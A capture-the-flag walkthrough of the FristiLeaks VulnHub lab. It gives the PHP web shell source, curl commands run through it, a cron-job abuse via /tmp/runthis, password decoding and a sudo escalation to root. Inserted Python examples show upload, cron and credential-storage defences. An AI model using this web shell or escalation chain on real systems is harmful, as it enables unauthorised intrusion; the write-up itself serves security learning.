Thanks Ar0xA for this "vuln"derful image.
This is my second completely self solved and first write up for vulnhub images. So cheers fellow #vulnhub fellas. \m/
Setup
My (attacker) IP: 192.168.56.102
Vulnerable Image IP: 192.168.56.103
Software setup: Oracle VirtualBox on Kali 2.0
Recon
Like any other challenge, we begin with our classic nmap scan:
$ nmap -A -p- 192.168.56.103 -oA fristileaks
With this we were able to enumerate the image and found out that only port 80 was open showing us -
However, the interesting part of this was the availability of robots.txt with 3 directories (/cola, /sisi, /beer), all of which had the same result - This is not the url you were looking for!
This was the guessing-game part of vulnhub images; unlike my previous challenge, this time I had a feel for how the guesses should go and, voilà, we got the right drink - fristi.
/fristi
After this came the obvious step of looking into the page source:
<meta name="description" content="super leet password login-test page. We use base64 encoding for images so they are inline in the HTML. I read somewhere on the web, that thats a good way to do it.">
<!--
TODO:
We need to clean this up for production. I left some junk in here to make testing easier.
- by eezeepz
-->
At the bottom of the page we found a small base64-encoded snippet,
which decoded to the image below.
<!--
iVBORw0KGgoAAAANSUhEUgAAAW0AAABLCAIAAAA04UHqAAAAAXNSR0IArs4c6QAAAARnQU1BAACx
jwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAARSSURBVHhe7dlRdtsgEIVhr8sL8nqymmwmi0kl
S0iAQGY0Nb01//dWSQyTgdxz2t5+AcCHHAHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixw
B4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzkCwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL5kc+f
m63yaP7/XP/5RUM2jx7iMz1ZdqpguZHPl+zJO53b9+1gd/0TL2Wull5+RMpJq5tMTkE1paHlVXJJ
Zv7/d5i6qse0t9rWa6UMsR1+WrORl72DbdWKqZS0tMPqGl8LRhzyWjWkTFDPXFmulC7e81bxnNOvb
DpYzOMN1WqplLS0w+oaXwomXXtfhL8e6W+lrNdDFujoQNJ9XbKtHMpSUmn9BSeGf51bUcr6W+VjNd
jJQjcelwepPCjlLNXFpi8gktXfnVtYSd6UpINdPFCDlyKB3dyPLpSTVzZYnJR7R0WHEiFGv5NrDU
12qmC/1/Zz2ZWXi1abli0aLqjZdq5sqSxUgtWY7syq+u6UpINdOFeI5ENygbTfj+qDbc+QpG9c5
uvFQzV5aM15LlyMrfnrPU12qmC+Ucqd+g6E1JNsX16/i/6BtvvEQzF5YM2JLhyMLz4sNNtp/pSkg1
04VajmwziEdZvmSz9E0YbzbI/FSycgVSzZiXDNmS4cjCni+kLRnqizXThUqOhEkso2k5pGy00aLq
i1n+skSqGfOSIVsKC5Zv4+XH36vQzbl0V0t9rWb6EMyRaLLp+Bbhy31k8SBbjqpUNSHVjHXJmC2Fg
tOH0drysrz404sdLPW1mulDLUdSpdEsk5vf5Gtqg1xnfX88tu/PZy7VjHXJmC21H9lWvBBfdZb6Ws
30oZ0jk3y+pQ9fnEG4lNOco9UnY5dqxrhk0JZKezwdNwqfnv6AOUN9sWb6UMyR5zT2B+lwDh++Fl
3K/U+z2uFJNWNcMmhLzUe2v6n/dAWG+mLN9KGWI9EcKsMJl6o6+ecH8dv0Uu4PnkqDl2rGuiS8HK
ul9iMrFG9gqa/VTB8qORLuSTqF7fYU7tgsn/4+zfhV6aiiIsczlGrGvGTIlsLLhiPbnh6KnLDU12q
mD+0cKQ8nunpVcZ21Rj7erEz0WqoZ+5IRW1oXNB3Z/vBMWulSfYlm+hDLkcIAtuHEUzu/l9l867X34
rPtA6lmLi0ZrqX6gu37aIukRkVaylRfqpk+9HNkH85hNocTKC4P31Vebhd8fy/VzOTCkqeBWlrrFhe
EPdMjO3SSys7XVF+qmT5UcmT9+Ss//fyyOLU3kWoGLd59ZKb6Us10IZMjAP5b5AgAL3IEgBc5AsCLH
AHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixwB4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzk
CwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL3IEgBc5AsCLHAHgRY4A8Pn9/QNa7zik1qtycQAAAABJR
U5ErkJggg==
-->
This leads us to
By now we can all guess who the user is and what his password would be.
/home/eezeepz
After logging in, the harder part of the 4 hours began: we now find a file upload page.
From the enumeration we knew the server was Apache 2.2.15 running PHP 5.3.3.
That pointed to the most common configuration mistake with this stack: an upload named x.php.png passes the image check but is still executed as PHP.
I quickly wrote a 5 line script and uploaded it to the server.
<?php
if(isset($_REQUEST['cmd'])){
    $cmd = ($_REQUEST["cmd"]);
    system($cmd);
    echo "</pre>$cmd<pre>";
    die;
}
?>
The best way to get output from this shell is via curl -
$ curl http://192.168.56.103/fristi/uploads/shell.php.png -d"cmd=ls"
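The reason shell.php.png runs at all is Apache's multiple-extension handling: when PHP is registered with AddHandler instead of a FilesMatch scoped to names ending in .php, any file with .php anywhere in its name is handed to the PHP engine, so an upload filter that only looks at the last extension is not enough. As an added example (not code from the original post or from the challenge), here is a Python comparison of that naive last-extension check against a validator that rejects an executable extension anywhere in the name, checks the magic bytes, and stores the file under a generated name. The allow and deny lists and the signature table are assumptions chosen for illustration.

```python
import os
import secrets
from typing import Optional

# Constructed lists for illustration; tune them for a real application.
ALLOWED_IMAGE_EXTS = {"png", "jpg", "jpeg", "gif"}
EXECUTABLE_EXTS = {"php", "php3", "php4", "php5", "phtml", "phar", "cgi", "pl", "py", "sh"}

# Magic bytes for the image types we accept (constructed table).
IMAGE_SIGNATURES = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}


def naive_extension_check(filename: str) -> bool:
    """The kind of check that lets shell.php.png through: only the last extension is inspected."""
    return filename.rsplit(".", 1)[-1].lower() in ALLOWED_IMAGE_EXTS


def hardened_upload_name(filename: str, head: bytes) -> Optional[str]:
    """Return a safe storage name, or None if the upload must be rejected.

    - strips any directory component, so the name cannot traverse paths
    - requires the final extension to be an allow-listed image type
    - rejects an executable extension anywhere in the name, because Apache
      configured with AddHandler would still run shell.php.png as PHP
    - checks the file's leading bytes against the claimed type
    - stores under a random name, so the client never controls the path
    """
    base = os.path.basename(filename)
    parts = base.lower().split(".")
    if len(parts) < 2 or not parts[0]:
        return None
    exts = parts[1:]
    if exts[-1] not in ALLOWED_IMAGE_EXTS:
        return None
    if any(e in EXECUTABLE_EXTS for e in exts):
        return None
    if not head.startswith(IMAGE_SIGNATURES[exts[-1]]):
        return None
    return f"{secrets.token_hex(16)}.{exts[-1]}"


if __name__ == "__main__":
    png_head = IMAGE_SIGNATURES["png"] + b"\x00" * 8          # constructed sample header
    print(naive_extension_check("shell.php.png"))             # True: the naive check passes it
    print(hardened_upload_name("shell.php.png", png_head))    # None: rejected
    print(hardened_upload_name("holiday.png", png_head))      # random name ending in .png
```

Renaming on the server side is the part that matters most: even if the name check had a gap, the stored file never carries a client-chosen extension, and the upload directory should additionally be served with script execution disabled.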
/home/admin
Somehow I didn't mind this interface and didn't bother getting a reverse TCP connection until a later stage.
After this, I went through the usual directory traversal until I hit this:
$ curl http://192.168.56.103/fristi/uploads/shell.php.png -d"cmd=cat ../../../notes.txt"
hey eezeepz your homedir is a mess, go clean it up, just dont delete
the important stuff.
-jerry
</pre>cat ../../../notes.txt<pre>
After going to /home/eezeepz and analyzing the contents, I got hold of this:
$ curl http://192.168.56.103/fristi/uploads/shell.php.png -d"cmd=cat /home/eezeepz/notes.txt"
Yo EZ,
I made it possible for you to do some automated checks,
but I did only allow you access to /usr/bin/* system binaries. I did
however copy a few extra often needed commands to my
homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those
from /home/admin/
Don't forget to specify the full path for each binary!
Just put a file called "runthis" in /tmp/, each line one command. The
output goes to the file "cronresult" in /tmp/. It should
run every minute with my account privileges.
- Jerry
</pre>cat /home/eezeepz/notes.txt<pre>
Trying to traverse into /home/admin/ gave me a *Permission Denied* error. So, going through the last half of this message again, the path was pretty clear.
$ curl http://192.168.56.103/fristi/uploads/shell.php.png -d"cmd=echo 'chmod 777 /home/admin'>/tmp/runthis"
Unfortunately, this attempt failed because we didn't read the entire message.
$ curl http://192.168.56.103/fristi/uploads/shell.php.png -d"cmd=cat /tmp/cronresult"
command did not start with /home/admin or /usr/bincommand did not start with /home/admin or /usr/bincommand did not start with /home/admin or /usr/bin
$ curl http://192.168.56.103/fristi/uploads/shell.php.png -d"cmd=echo '/home/admin/chmod 777 /home/admin'>/tmp/runthis"
We get,
$ curl http://192.168.56.103/fristi/uploads/shell.php.png -d"cmd=cat /tmp/cronresult"
command did not start with /home/admin or /usr/bincommand did not start with /home/admin or /usr/bincommand did not start with /home/admin or /usr/bin
executing: /home/admin/chmod 777 /home/admin
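The cron job's filter is only a string-prefix test on each line, so anything that begins with one of the two prefixes runs with Jerry's privileges. As an added example (not the challenge's cron script, whose source is never shown; the prefix test is reconstructed from the message in cronresult), here is a Python reconstruction of that test beside a stricter validator: it canonicalises the binary path with os.path.normpath, requires exact membership in an explicit allowlist of full paths, and refuses shell metacharacters so the resulting argv can be handed to subprocess without a shell. The allowlist and the sample runthis lines are assumptions.

```python
import os
import shlex
from typing import List, Optional

# Reconstructed from the error text in /tmp/cronresult; the real script is not shown.
ALLOWED_PREFIXES = ("/home/admin", "/usr/bin")


def prefix_check(line: str) -> bool:
    """The filter as cronresult describes it: accept any line that starts with a prefix."""
    return line.startswith(ALLOWED_PREFIXES)


# Assumed allowlist for the stricter validator: exact, canonical paths of the
# few read-only commands the automated checks actually need.
ALLOWED_BINARIES = {"/usr/bin/df", "/usr/bin/id", "/usr/bin/uptime"}
SHELL_METACHARS = set(";&|`$<>(){}\n")


def strict_parse(line: str) -> Optional[List[str]]:
    """Return the argv to execute (without a shell), or None to reject the line."""
    if any(ch in SHELL_METACHARS for ch in line):
        return None                      # nothing here should ever reach /bin/sh
    try:
        argv = shlex.split(line)
    except ValueError:
        return None                      # unbalanced quotes
    if not argv:
        return None
    # Canonicalise before comparing: normpath collapses '.' and '..' components,
    # so the comparison is against the path that would actually run, and it is
    # exact membership rather than a prefix match. (os.path.realpath would also
    # follow symlinks, at the cost of touching the filesystem.)
    binary = os.path.normpath(argv[0])
    if binary not in ALLOWED_BINARIES:
        return None
    return [binary] + argv[1:]


if __name__ == "__main__":
    runthis = [                                  # constructed sample of /tmp/runthis
        "/usr/bin/df -h",
        "/home/admin/chmod 777 /home/admin",     # the line used in this write-up
    ]
    for line in runthis:
        print(f"{line!r}: prefix_check={prefix_check(line)} strict={strict_parse(line)}")
```

Even the strict version only narrows the damage. The underlying design flaw is that a privileged cron job reads its commands from a world-writable file in /tmp; the fix a practitioner would push for is to take the command list from a root-owned file, or to replace the free-form list with a fixed set of named checks.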
/home/fristigod
Analyzing the contents of this directory, we could see a few interesting files -
$ curl http://192.168.56.103/fristi/uploads/shell.php.png -d"cmd=cat /home/admin/cryptedpass.txt"
mVGZ3O3omkJLmy2pcuTq
</pre>cat /home/admin/cryptedpass.txt<pre>
$ curl http://192.168.56.103/fristi/uploads/shell.php.png -d"cmd=cat /home/admin/cryptpass.py"
#Enhanced with thanks to Dinesh Singh Sikawar @LinkedIn
import base64,codecs,sys
def encodeString(str):
    base64string= base64.b64encode(str)
    return codecs.encode(base64string[::-1], 'rot13')
cryptoResult=encodeString(sys.argv[1])
print cryptoResult
</pre>cat /home/admin/cryptpass.py<pre>
$ curl http://192.168.56.103/fristi/uploads/shell.php.png -d"cmd=cat /home/admin/whoisyourgodnow.txt"
=RFn0AKnlMHMPIzpyuTI0ITG
</pre>cat /home/admin/whoisyourgodnow.txt<pre>
I quickly wrote a decoding program (by editing the same script, hence the function name was not updated):
$ cat decryptpass.py
#!/usr/bin/python
import base64,codecs,sys
def encodeString(str):
    # rot13 is its own inverse (26 letters, shifted by 13), so applying it again undoes that step
    base64string = codecs.encode(str[::-1], 'rot13')
    # base64 decoding
    return base64.b64decode(base64string)
cryptoResult=encodeString(sys.argv[1])
print cryptoResult
So decrypting the results -
$ python decryptpass.py mVGZ3O3omkJLmy2pcuTq
thisisalsopw123
$ python decryptpass.py =RFn0AKnlMHMPIzpyuTI0ITG
LetThereBeFristi!
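As an added example (my own Python 3 port, not the author's decryptpass.py and not the challenge's cryptpass.py), both directions side by side. It makes the defensive point explicit: base64, a string reversal and rot13 involve no key, so anyone who can read the "crypted" text recovers the password in a few lines, and a file like cryptedpass.txt protects nothing. The function names are my own.

```python
import base64
import codecs


def encode_string(plaintext: str) -> str:
    """Reproduce cryptpass.py under Python 3: base64, reverse, then rot13."""
    b64 = base64.b64encode(plaintext.encode("utf-8")).decode("ascii")
    return codecs.encode(b64[::-1], "rot13")


def decode_string(obfuscated: str) -> str:
    """Undo each step in reverse order.

    rot13 is its own inverse and acts per character, so it commutes with the
    reversal; base64 padding ('=') is untouched by rot13 and returns to the
    tail once the string is reversed back.
    """
    b64 = codecs.encode(obfuscated, "rot13")[::-1]
    return base64.b64decode(b64).decode("utf-8")


def round_trips(plaintext: str) -> bool:
    """Sanity check that decode_string inverts encode_string."""
    return decode_string(encode_string(plaintext)) == plaintext


if __name__ == "__main__":
    # The two strings found under /home/admin on the box.
    for blob in ("mVGZ3O3omkJLmy2pcuTq", "=RFn0AKnlMHMPIzpyuTI0ITG"):
        print(blob, "->", decode_string(blob))
```

The lesson for anyone storing credentials: reversible transforms without a secret are obfuscation, not encryption. Passwords that have to be verified should be hashed with a slow, salted algorithm; secrets that must be recovered need a real cipher with a key kept away from the data.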

So now that we have two sets of passwords, we try them on the user accounts. On accessing the /home/ directory, we saw three user profiles - admin, eezeepz and fristigod. The only major problem was that to run a sudo command and elevate privileges I would need a tty, for which I needed a stable reverse shell and not only a PHP web shell. After attempting to build a custom simple shell and failing multiple times (netcat and telnet were not on the system, so I was trying to get a PHP or Python reverse TCP connection), I just switched back to my script kiddie nature and used php-reverse-shell to get access into the machine.
/root/
Launching a tty to escalate privileges with sudo can be done with the Python one-liner (thank you Pentest Monkey, again):
$ python -c 'import pty; pty.spawn("/bin/sh")'
After this I was able to figure out the credentials of admin(thisisalsopw123) and fristigod(LetThereBeFristi!).
My hope of admin being the sudo user was dashed, and on running find / -perm -4000 I pretty much got the idea who the sudo user is (last line: find: `/var/fristigod': Permission denied).
After su fristigod, I ran find / -perm -4000 to find
/var/fristigod/.secret_admin_stuff/doCom
Unfortunately,
bash-4.1$ ./var/fristigod/.secret_admin_stuff/doCom
./var/fristigod/.secret_admin_stuff/doCom
Nice try, but wrong user ;)
Traversing into the directory, I figured doCom was executable only with root perms, but the perms on this folder had been given to fristigod. This was the obvious point of escalation. Hence I tried harder,
bash-4.1$ sudo ./doCom
sudo ./doCom
Sorry, user fristigod is not allowed to execute './doCom' as root on localhost.localdomain.
At this point I knew I had to run it as a different user. On analyzing /etc/passwd I saw a user named fristi. I knew this was the user. However, I still ran
bash-4.1$ sudo -l
sudo -l
Matching Defaults entries for fristigod on this host:
requiretty, !visiblepw, always_set_home, env_reset, env_keep="COLORS
DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1
PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE
LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL
LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User fristigod may run the following commands on this host:
(fristi : ALL) /var/fristigod/.secret_admin_stuff/doCom
This was the confirmation. The next command let me run the binary:
bash-4.1$ sudo -u fristi ./doCom
sudo -u fristi ./doCom
Usage: ./program_name terminal_command ...
This was simple now,
bash-4.1$ sudo -u fristi ./doCom /bin/bash
sudo -u fristi ./doCom /bin/bash
bash-4.1# id
id
uid=0(root) gid=100(users) groups=100(users),502(fristigod)
Pwn'd. Now for the flag -
bash-4.1# cd /root
cd /root
bash-4.1# ls
ls
fristileaks_secrets.txt
bash-4.1# cat fristileaks_secrets.txt
cat fristileaks_secrets.txt
Congratulations on beating FristiLeaks 1.0 by Ar0xA [https://tldr.nu]
I wonder if you beat it in the maximum 4 hours it's supposed to take!
Shoutout to people of #fristileaks (twitter) and #vulnhub (FreeNode)
Flag: Y0u_kn0w_y0u_l0ve_fr1st1
And w00t w00t! Fristileaks solved within 4 hours :)
Hope to continue pwn'ing such challenges from Vulnhub.